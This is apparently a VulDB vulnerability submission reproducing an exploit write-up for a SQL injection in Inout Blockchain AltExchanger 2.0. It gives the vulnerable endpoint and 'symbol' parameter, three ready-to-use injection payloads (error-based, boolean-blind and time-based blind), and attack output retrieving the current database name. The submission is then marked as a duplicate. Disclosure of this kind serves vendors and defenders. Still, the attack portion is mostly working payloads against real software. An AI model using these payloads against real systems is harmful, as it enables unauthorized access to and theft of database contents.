Submit #177561: Inout Blockchain AltExchanger 2.0 - SQL Injection

Title: Inout Blockchain AltExchanger 2.0 - SQL Injection
Description:

# Exploit Title: Inout Blockchain AltExchanger 2.0 - SQL Injection
# Date: 04/07/2023
# Exploit Author: CraCkEr
# Vendor: Inout Scripts
# Vendor Homepage: https://www.inoutscripts.com/
# Software Link: https://www.inoutscripts.com/products/inout-blockchain-altexchanger/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Database Access

Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Path: /application/third_party/Chart/TradingView/chart_content/master.php/history

https://website/application/third_party/Chart/TradingView/chart_content/master.php/history?symbol=[SQLI]&resolution=5&from=1688226203&to=1688229203

GET parameter 'symbol' is vulnerable to SQL Injection

---
Parameter: symbol (GET)

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: symbol=ZRX-BTC') AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: symbol=ZRX-BTC') AND 06585=6585

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: symbol=ZRX-BTC'XOR(IF(now()=sysdate(),SLEEP(8),0))XOR'Z&resolution=5&from=1688226203&to=1688229203
---

[+] Starting the Attack

fetching current database
current database: '*****_blockchain_altexchanger_***'

[-] Done
User: skalvin (UID 49463)
Submission: 04/07/2023 18:01 (3 years ago)
Moderation: 11/07/2023 17:23 (7 days later)
Status: Duplicate
VulDB entry: 200588 [Inout Blockchain AltExchanger master.php symbol SQL injection]
Points: 0
